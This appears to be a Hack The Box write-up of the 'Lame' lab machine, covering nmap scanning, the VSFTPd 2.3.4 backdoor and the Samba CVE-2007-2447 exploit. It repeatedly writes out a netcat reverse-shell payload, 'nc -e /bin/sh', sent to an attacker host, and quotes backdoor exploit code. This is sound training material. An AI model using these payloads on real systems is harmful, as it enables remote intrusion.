Join The Best Hacking Community Worldwide | Hack The Box
Over half a million platform members exhange ideas and methodologies. Be one of us and help the community grow even further!
www.hackthebox.com
Run a quick nmap scan
How many of the nmap top 1000 TCP ports are open on the remote host? 4
What version of VSFTPd is running on Lame? 2.3.4
There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here? no
https://www.exploit-db.com/exploits/49757
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
What version of Samba is running on Lame? Give the numbers up to but not including "-Debian". 3.0.20
To enumerate Samba version, let’s run nmap scan with specific flags
We will try listing SMB shares using anonymous login - it worked.
What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf? CVE-2007-2447
We will use the exploit https://github.com/Ziemni/CVE-2007-2447-in-Python
You can create a Python virtual environment to install pysmb without modifying the system Python installation.
Solution 1: Use a Python Virtual Environment
You can create a Python virtual environment to install pysmb without modifying the system Python installation.
- Create a virtual environment:
- Activate the virtual environment:
- Install
pysmbwithin the virtual environment: - Run your script:
Now that the environment is set up, run your
smbExploit.pyscript:
python3 -m venv ~/venv/pysmb-envsource ~/venv/pysmb-env/bin/activatepip install pysmbpython3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'To exit the virtual environment later, you can simply type:
deactivateSolution 2: Use pipx to Install pysmb
pipx allows you to install Python packages in isolated environments and run them easily.
- Install
pipx: - Install
pysmbusingpipx: - Run your script:
Since
pipxmanages the dependencies, you should be able to runsmbExploit.pywithout issues:
sudo apt install pipxpipx install pysmbpython3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'We will stick with first solution (remember to set up a listener on port 443)
python3 -m venv ~/venv/pysmb-env
source ~/venv/pysmb-env/bin/activate
pip install pysmb
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'We caught the reverse shell
We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones on 0.0.0.0 and the boxes external IP, so they should be accessible. What must be blocking connection to these ports? firewall
When the VSFTPd backdoor is trigger, what port starts listening? 6200
If we look at the exploit closely from https://www.exploit-db.com/exploits/49757, the exploit shows that backdoor connects to port 6200
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?
We will run the exploit and check. This time, we will use Metasploit.
On the reverse shell, we have caught earlier, we will run ss -ntplu
The ss -ntplu command is used to display information about network connections in Linux, including both TCP and UDP listening ports. Here's what each flag stands for:
n: Show numerical addresses instead of resolving hostnames.t: Display TCP sockets.p: Show the processes using the sockets.l: Show only listening sockets.u: Display UDP sockets.
When you run this command, it will display a list of all the TCP and UDP listening sockets along with the associated processes.
As highlighted, we can see that port 6200 starts listening on Lame.